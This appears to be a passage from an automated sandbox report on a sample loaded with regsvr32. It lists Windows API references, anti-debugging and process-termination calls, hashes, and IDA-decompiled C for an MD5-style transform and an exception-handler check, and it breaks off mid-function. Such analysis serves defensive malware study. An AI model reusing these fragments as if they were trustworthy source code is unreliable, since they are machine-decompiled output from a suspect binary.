                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6E2C7436
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 9677af8e66bbaf9499110cf727ae6b276f47f91635840bb937f2ffae6c0d7071
                                    • Instruction ID: a9d3db9f4c8076c2081e12fbfe2dfb279c782f81b7303e74028a454cbbfe98ac
                                    • Opcode Fuzzy Hash: 9677af8e66bbaf9499110cf727ae6b276f47f91635840bb937f2ffae6c0d7071
                                    • Instruction Fuzzy Hash: AA31F67490122D9BCBA1DF64DC88BCDBBB9BF08710F1046DAE41CA7290EB709B818F55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,6E2C5D05,?,6E2F4E10,0000000C,6E2C5E38,00000000,00000000,00000001,6E2C3545,6E2F4CE0,0000000C,6E2C33FD,?), ref: 6E2C5D50
                                    • TerminateProcess.KERNEL32(00000000,?,6E2C5D05,?,6E2F4E10,0000000C,6E2C5E38,00000000,00000000,00000001,6E2C3545,6E2F4CE0,0000000C,6E2C33FD,?), ref: 6E2C5D57
                                    • ExitProcess.KERNEL32 ref: 6E2C5D69
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 3be6de2b45e3a59dd45371b8de86251533fe4bc351b06af90847f1d0d5da3872
                                    • Instruction ID: 0c4135365782c36590e8a82e2ee0b7951e78303dcc0a7c966f204dac9c2fb601
                                    • Opcode Fuzzy Hash: 3be6de2b45e3a59dd45371b8de86251533fe4bc351b06af90847f1d0d5da3872
                                    • Instruction Fuzzy Hash: 12E04635040A08AFCF816FA0CD0DA983B3BEB02A8AB040914F8089A120DB75DD52CAA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: .
                                    • API String ID: 0-248832578
                                    • Opcode ID: d32234523ebc81fac8896242ca540ccbe98d311f69552c3cea30ebe9afa818f3
                                    • Instruction ID: 167f2551857a17ce910428519f3e9fb18dd8ec3655575324401076b778a6b799
                                    • Opcode Fuzzy Hash: d32234523ebc81fac8896242ca540ccbe98d311f69552c3cea30ebe9afa818f3
                                    • Instruction Fuzzy Hash: 7A31097181010E6FCB948EB8CC84EEB7B7EEF45B18F100398E919D7284E6319A44CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E001A4FA7(void* __ecx, intOrPtr* _a4) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				void _v76;
                                    				intOrPtr* _t226;
                                    				signed int _t229;
                                    				signed int _t231;
                                    				signed int _t233;
                                    				signed int _t235;
                                    				signed int _t237;
                                    				signed int _t239;
                                    				signed int _t241;
                                    				signed int _t243;
                                    				signed int _t245;
                                    				signed int _t247;
                                    				signed int _t249;
                                    				signed int _t251;
                                    				signed int _t253;
                                    				signed int _t255;
                                    				signed int _t257;
                                    				signed int _t259;
                                    				signed int _t274;
                                    				signed int _t337;
                                    				void* _t347;
                                    				signed int _t348;
                                    				signed int _t350;
                                    				signed int _t352;
                                    				signed int _t354;
                                    				signed int _t356;
                                    				signed int _t358;
                                    				signed int _t360;
                                    				signed int _t362;
                                    				signed int _t364;
                                    				signed int _t366;
                                    				signed int _t375;
                                    				signed int _t377;
                                    				signed int _t379;
                                    				signed int _t381;
                                    				signed int _t383;
                                    				intOrPtr* _t399;
                                    				signed int _t407;
                                    				signed int _t409;
                                    				signed int _t411;
                                    				signed int _t413;
                                    				signed int _t415;
                                    				signed int _t417;
                                    				signed int _t419;
                                    				signed int _t421;
                                    				signed int _t423;
                                    				signed int _t425;
                                    				signed int _t427;
                                    				signed int _t429;
                                    				signed int _t437;
                                    				signed int _t439;
                                    				signed int _t441;
                                    				signed int _t443;
                                    				signed int _t445;
                                    				void* _t447;
                                    				signed int _t507;
                                    				signed int _t598;
                                    				signed int _t606;
                                    				signed int _t612;
                                    				signed int _t678;
                                    				signed int* _t681;
                                    				signed int _t682;
                                    				signed int _t684;
                                    				signed int _t689;
                                    				signed int _t691;
                                    				signed int _t696;
                                    				signed int _t698;
                                    				signed int _t717;
                                    				signed int _t719;
                                    				signed int _t721;
                                    				signed int _t723;
                                    				signed int _t725;
                                    				signed int _t727;
                                    				signed int _t733;
                                    				signed int _t739;
                                    				signed int _t741;
                                    				signed int _t743;
                                    				signed int _t745;
                                    				signed int _t747;
                                    
                                    				_t226 = _a4;
                                    				_t347 = __ecx + 2;
                                    				_t681 =  &_v76;
                                    				_t447 = 0x10;
                                    				do {
                                    					_t274 =  *(_t347 - 1) & 0x000000ff;
                                    					_t347 = _t347 + 4;
                                    					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                                    					_t681 =  &(_t681[1]);
                                    					_t447 = _t447 - 1;
                                    				} while (_t447 != 0);
                                    				_t6 = _t226 + 4; // 0x14eb3fc3
                                    				_t682 =  *_t6;
                                    				_t7 = _t226 + 8; // 0x8d08458b
                                    				_t407 =  *_t7;
                                    				_t8 = _t226 + 0xc; // 0x56c1184c
                                    				_t348 =  *_t8;
                                    				asm("rol eax, 0x7");
                                    				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                                    				asm("rol ecx, 0xc");
                                    				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                                    				asm("ror edx, 0xf");
                                    				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                                    				asm("ror esi, 0xa");
                                    				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                                    				_v8 = _t684;
                                    				_t689 = _v8;
                                    				asm("rol eax, 0x7");
                                    				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                                    				asm("rol ecx, 0xc");
                                    				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                                    				asm("ror edx, 0xf");
                                    				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                                    				asm("ror esi, 0xa");
                                    				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                                    				_v8 = _t691;
                                    				_t696 = _v8;
                                    				asm("rol eax, 0x7");
                                    				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                                    				asm("rol ecx, 0xc");
                                    				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                                    				asm("ror edx, 0xf");
                                    				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                                    				asm("ror esi, 0xa");
                                    				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                                    				_v8 = _t698;
                                    				asm("rol eax, 0x7");
                                    				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                    				asm("rol ecx, 0xc");
                                    				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                                    				_t507 =  !_t356;
                                    				asm("ror edx, 0xf");
                                    				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                                    				_v12 = _t415;
                                    				_v12 =  !_v12;
                                    				asm("ror esi, 0xa");
                                    				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                                    				asm("rol eax, 0x5");
                                    				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                                    				asm("rol ecx, 0x9");
                                    				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                                    				asm("rol edx, 0xe");
                                    				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                                    				asm("ror esi, 0xc");
                                    				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                                    				asm("rol eax, 0x5");
                                    				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                                    				asm("rol ecx, 0x9");
                                    				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                                    				asm("rol edx, 0xe");
                                    				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                                    				asm("ror esi, 0xc");
                                    				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                                    				asm("rol eax, 0x5");
                                    				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                                    				asm("rol ecx, 0x9");
                                    				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                                    				asm("rol edx, 0xe");
                                    				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                                    				asm("ror esi, 0xc");
                                    				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                                    				asm("rol eax, 0x5");
                                    				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                                    				asm("rol ecx, 0x9");
                                    				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                                    				asm("rol edx, 0xe");
                                    				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                                    				asm("ror esi, 0xc");
                                    				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                                    				asm("rol eax, 0x4");
                                    				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                                    				asm("rol ecx, 0xb");
                                    				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                                    				asm("rol edx, 0x10");
                                    				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                                    				_t598 = _t366 ^ _t425;
                                    				asm("ror esi, 0x9");
                                    				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                                    				asm("rol eax, 0x4");
                                    				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                                    				asm("rol edi, 0xb");
                                    				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                                    				asm("rol edx, 0x10");
                                    				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                                    				_t337 = _t606 ^ _t427;
                                    				asm("ror ecx, 0x9");
                                    				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                                    				asm("rol eax, 0x4");
                                    				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                                    				asm("rol esi, 0xb");
                                    				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                                    				asm("rol edi, 0x10");
                                    				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                                    				_t429 = _t733 ^ _t612;
                                    				asm("ror ecx, 0x9");
                                    				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                                    				asm("rol eax, 0x4");
                                    				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                                    				asm("rol edx, 0xb");
                                    				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                                    				asm("rol esi, 0x10");
                                    				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                                    				asm("ror ecx, 0x9");
                                    				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                                    				asm("rol eax, 0x6");
                                    				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                                    				asm("rol edx, 0xa");
                                    				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                                    				asm("rol esi, 0xf");
                                    				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                                    				asm("ror ecx, 0xb");
                                    				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                                    				asm("rol eax, 0x6");
                                    				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                                    				asm("rol edx, 0xa");
                                    				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                                    				asm("rol esi, 0xf");
                                    				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                                    				asm("ror ecx, 0xb");
                                    				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                                    				asm("rol eax, 0x6");
                                    				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                                    				asm("rol edx, 0xa");
                                    				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                                    				asm("rol esi, 0xf");
                                    				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                                    				asm("ror edi, 0xb");
                                    				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                                    				asm("rol eax, 0x6");
                                    				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                                    				asm("rol edx, 0xa");
                                    				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                                    				_t399 = _a4;
                                    				asm("rol esi, 0xf");
                                    				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                                    				 *_t399 =  *_t399 + _t259;
                                    				asm("ror eax, 0xb");
                                    				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                                    				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                                    				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                                    				return memset( &_v76, 0, 0x40);
                                    			}


                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID:
                                    • API String ID: 2221118986-0
                                    • Opcode ID: fd7bc766d4c076c0fc6ef6b18f36817df6ffc8674d59026e291d3086fa030388
                                    • Instruction ID: 4b37d787df4365849c7b7b78807fa001c99f21cf708416e5834f622b7935c788
                                    • Opcode Fuzzy Hash: fd7bc766d4c076c0fc6ef6b18f36817df6ffc8674d59026e291d3086fa030388
                                    • Instruction Fuzzy Hash: 1022847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E2CC83C,?,?,00000008,?,?,6E2CC4DC,00000000), ref: 6E2CCA6E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 5dbef556ad917679d9667abad86f5c1617844c0976f4b1c311ab57fab68aa60d
                                    • Instruction ID: ed05fa10ada0fd62e9699960988a07e5b8895f778be85f96af17dfb56cb16a4b
                                    • Opcode Fuzzy Hash: 5dbef556ad917679d9667abad86f5c1617844c0976f4b1c311ab57fab68aa60d
                                    • Instruction Fuzzy Hash: B5B1AE3122060ACFD785CF68C496B657BE1FF05B65F258658E8EACF2A1C335D981CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E001A8055(long _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				short* _v32;
                                    				void _v36;
                                    				void* _t57;
                                    				signed int _t58;
                                    				signed int _t61;
                                    				signed int _t62;
                                    				void* _t63;
                                    				signed int* _t68;
                                    				intOrPtr* _t69;
                                    				intOrPtr* _t71;
                                    				intOrPtr _t72;
                                    				intOrPtr _t75;
                                    				void* _t76;
                                    				signed int _t77;
                                    				void* _t78;
                                    				void _t80;
                                    				signed int _t81;
                                    				signed int _t84;
                                    				signed int _t86;
                                    				short* _t87;
                                    				void* _t89;
                                    				signed int* _t90;
                                    				long _t91;
                                    				signed int _t93;
                                    				signed int _t94;
                                    				signed int _t100;
                                    				signed int _t102;
                                    				void* _t104;
                                    				long _t108;
                                    				signed int _t110;
                                    
                                    				_t108 = _a4;
                                    				_t76 =  *(_t108 + 8);
                                    				if((_t76 & 0x00000003) != 0) {
                                    					L3:
                                    					return 0;
                                    				}
                                    				_a4 =  *[fs:0x4];
                                    				_v8 =  *[fs:0x8];
                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                    					_t102 =  *(_t108 + 0xc);
                                    					__eflags = _t102 - 0xffffffff;
                                    					if(_t102 != 0xffffffff) {
                                    						_t91 = 0;
                                    						__eflags = 0;
                                    						_a4 = 0;
                                    						_t57 = _t76;
                                    						do {
                                    							_t80 =  *_t57;
                                    							__eflags = _t80 - 0xffffffff;
                                    							if(_t80 == 0xffffffff) {
                                    								goto L9;
                                    							}
                                    							__eflags = _t80 - _t91;
                                    							if(_t80 >= _t91) {
                                    								L20:
                                    								_t63 = 0;
                                    								L60:
                                    								return _t63;
                                    							}
                                    							L9:
                                    							__eflags =  *(_t57 + 4);
                                    							if( *(_t57 + 4) != 0) {
                                    								_t12 =  &_a4;
                                    								 *_t12 = _a4 + 1;
                                    								__eflags =  *_t12;
                                    							}
                                    							_t91 = _t91 + 1;
                                    							_t57 = _t57 + 0xc;
                                    							__eflags = _t91 - _t102;
                                    						} while (_t91 <= _t102);
                                    						__eflags = _a4;
                                    						if(_a4 == 0) {
                                    							L15:
                                    							_t81 =  *0x1aa330; // 0x0
                                    							_t110 = _t76 & 0xfffff000;
                                    							_t58 = 0;
                                    							__eflags = _t81;
                                    							if(_t81 <= 0) {
                                    								L18:
                                    								_t104 = _t102 | 0xffffffff;
                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                    								__eflags = _t61;
                                    								if(_t61 < 0) {
                                    									_t62 = 0;
                                    									__eflags = 0;
                                    								} else {
                                    									_t62 = _a4;
                                    								}
                                    								__eflags = _t62;
                                    								if(_t62 == 0) {
                                    									L59:
                                    									_t63 = _t104;
                                    									goto L60;
                                    								} else {
                                    									__eflags = _v12 - 0x1000000;
                                    									if(_v12 != 0x1000000) {
                                    										goto L59;
                                    									}
                                    									__eflags = _v16 & 0x000000cc;
                                    									if((_v16 & 0x000000cc) == 0) {
                                    										L46:
                                    										_t63 = 1;
                                    										 *0x1aa378 = 1;
                                    										__eflags =  *0x1aa378;
                                    										if( *0x1aa378 != 0) {
                                    											goto L60;
                                    										}
                                    										_t84 =  *0x1aa330; // 0x0
                                    										__eflags = _t84;
                                    										_t93 = _t84;
                                    										if(_t84 <= 0) {
                                    											L51:
                                    											__eflags = _t93;
                                    											if(_t93 != 0) {
                                    												L58:
                                    												 *0x1aa378 = 0;
                                    												goto L5;
                                    											}
                                    											_t77 = 0xf;
                                    											__eflags = _t84 - _t77;
                                    											if(_t84 <= _t77) {
                                    												_t77 = _t84;
                                    											}
                                    											_t94 = 0;
                                    											__eflags = _t77;
                                    											if(_t77 < 0) {
                                    												L56:
                                    												__eflags = _t84 - 0x10;
                                    												if(_t84 < 0x10) {
                                    													_t86 = _t84 + 1;
                                    													__eflags = _t86;
                                    													 *0x1aa330 = _t86;
                                    												}
                                    												goto L58;
                                    											} else {
                                    												do {
                                    													_t68 = 0x1aa338 + _t94 * 4;
                                    													_t94 = _t94 + 1;
                                    													__eflags = _t94 - _t77;
                                    													 *_t68 = _t110;
                                    													_t110 =  *_t68;
                                    												} while (_t94 <= _t77);
                                    												goto L56;
                                    											}
                                    										}
                                    										_t69 = 0x1aa334 + _t84 * 4;
                                    										while(1) {
                                    											__eflags =  *_t69 - _t110;
                                    											if( *_t69 == _t110) {
                                    												goto L51;
                                    											}
                                    											_t93 = _t93 - 1;
                                    											_t69 = _t69 - 4;
                                    											__eflags = _t93;
                                    											if(_t93 > 0) {
                                    												continue;
                                    											}
                                    											goto L51;
                                    										}
                                    										goto L51;
                                    									}
                                    									_t87 = _v32;
                                    									__eflags =  *_t87 - 0x5a4d;
                                    									if( *_t87 != 0x5a4d) {
                                    										goto L59;
                                    									}
                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                    									__eflags =  *_t71 - 0x4550;
                                    									if( *_t71 != 0x4550) {
                                    										goto L59;
                                    									}
                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                    										goto L59;
                                    									}
                                    									_t78 = _t76 - _t87;
                                    									__eflags =  *((short*)(_t71 + 6));
                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                    										goto L59;
                                    									}
                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                    									__eflags = _t78 - _t72;
                                    									if(_t78 < _t72) {
                                    										goto L46;
                                    									}
                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                    										goto L46;
                                    									}
                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                    										goto L20;
                                    									}
                                    									goto L46;
                                    								}
                                    							} else {
                                    								goto L16;
                                    							}
                                    							while(1) {
                                    								L16:
                                    								__eflags =  *((intOrPtr*)(0x1aa338 + _t58 * 4)) - _t110;
                                    								if( *((intOrPtr*)(0x1aa338 + _t58 * 4)) == _t110) {
                                    									break;
                                    								}
                                    								_t58 = _t58 + 1;
                                    								__eflags = _t58 - _t81;
                                    								if(_t58 < _t81) {
                                    									continue;
                                    								}
                                    								goto L18;
                                    							}
                                    							__eflags = _t58;
                                    							if(_t58 <= 0) {
                                    								goto L5;
                                    							}
                                    							 *0x1aa378 = 1;
                                    							__eflags =  *0x1aa378;
                                    							if( *0x1aa378 != 0) {
                                    								goto L5;
                                    							}
                                    							__eflags =  *((intOrPtr*)(0x1aa338 + _t58 * 4)) - _t110;
                                    							if( *((intOrPtr*)(0x1aa338 + _t58 * 4)) == _t110) {
                                    								L32:
                                    								_t100 = 0;
                                    								__eflags = _t58;
                                    								if(_t58 < 0) {
                                    									L34:
                                    									 *0x1aa378 = 0;
                                    									goto L5;
                                    								} else {
                                    									goto L33;
                                    								}
                                    								do {
                                    									L33:
                                    									_t90 = 0x1aa338 + _t100 * 4;
                                    									_t100 = _t100 + 1;
                                    									__eflags = _t100 - _t58;
                                    									 *_t90 = _t110;
                                    									_t110 =  *_t90;
                                    								} while (_t100 <= _t58);
                                    								goto L34;
                                    							}
                                    							_t25 = _t81 - 1; // -1
                                    							_t58 = _t25;
                                    							__eflags = _t58;
                                    							if(_t58 < 0) {
                                    								L28:
                                    								__eflags = _t81 - 0x10;
                                    								if(_t81 < 0x10) {
                                    									_t81 = _t81 + 1;
                                    									__eflags = _t81;
                                    									 *0x1aa330 = _t81;
                                    								}
                                    								_t28 = _t81 - 1; // 0x0
                                    								_t58 = _t28;
                                    								goto L32;
                                    							} else {
                                    								goto L25;
                                    							}
                                    							while(1) {
                                    								L25:
                                    								__eflags =  *((intOrPtr*)(0x1aa338 + _t58 * 4)) - _t110;
                                    								if( *((intOrPtr*)(0x1aa338 + _t58 * 4)) == _t110) {
                                    									break;
                                    								}
                                    								_t58 = _t58 - 1;
                                    								__eflags = _t58;
                                    								if(_t58 >= 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							__eflags = _t58;
                                    							if(__eflags >= 0) {
                                    								if(__eflags == 0) {
                                    									goto L34;
                                    								}
                                    								goto L32;
                                    							}
                                    							goto L28;
                                    						}
                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                    						__eflags = _t75 - _v8;
                                    						if(_t75 < _v8) {
                                    							goto L20;
                                    						}
                                    						__eflags = _t75 - _t108;
                                    						if(_t75 >= _t108) {
                                    							goto L20;
                                    						}
                                    						goto L15;
                                    					}
                                    					L5:
                                    					_t63 = 1;
                                    					goto L60;
                                    				} else {
                                    					goto L3;
                                    				}
                                    			}




































                                    0x00000000
                                    0x001a80d1
                                    0x001a8096
                                    0x001a8098
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 001A8106
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: MemoryQueryVirtual
                                    • String ID:
                                    • API String ID: 2850889275-0
                                    • Opcode ID: f3ae2a9994028bef5c26628c9ef1ee3df2501f08ee193ea2cef83a8a7cd82153
                                    • Instruction ID: 173e9af280c3d2d00d0bfaa59ccaf97044773e9a86ef9a566bfe9eda8a064056
                                    • Opcode Fuzzy Hash: f3ae2a9994028bef5c26628c9ef1ee3df2501f08ee193ea2cef83a8a7cd82153
                                    • Instruction Fuzzy Hash: 2D61D138A00A029FDF29CF29C99077973A6FF97354B24853AE852C7694EF31DC86C650
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E6E2A2274(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* __ebp;
                                    				signed int* _t43;
                                    				char _t44;
                                    				void* _t46;
                                    				void* _t49;
                                    				intOrPtr* _t53;
                                    				void* _t54;
                                    				void* _t65;
                                    				long _t66;
                                    				signed int* _t80;
                                    				signed int* _t82;
                                    				void* _t84;
                                    				signed int _t86;
                                    				void* _t89;
                                    				void* _t95;
                                    				void* _t96;
                                    				void* _t99;
                                    				void* _t106;
                                    
                                    				_t43 = _t84;
                                    				_t65 = __ebx + 2;
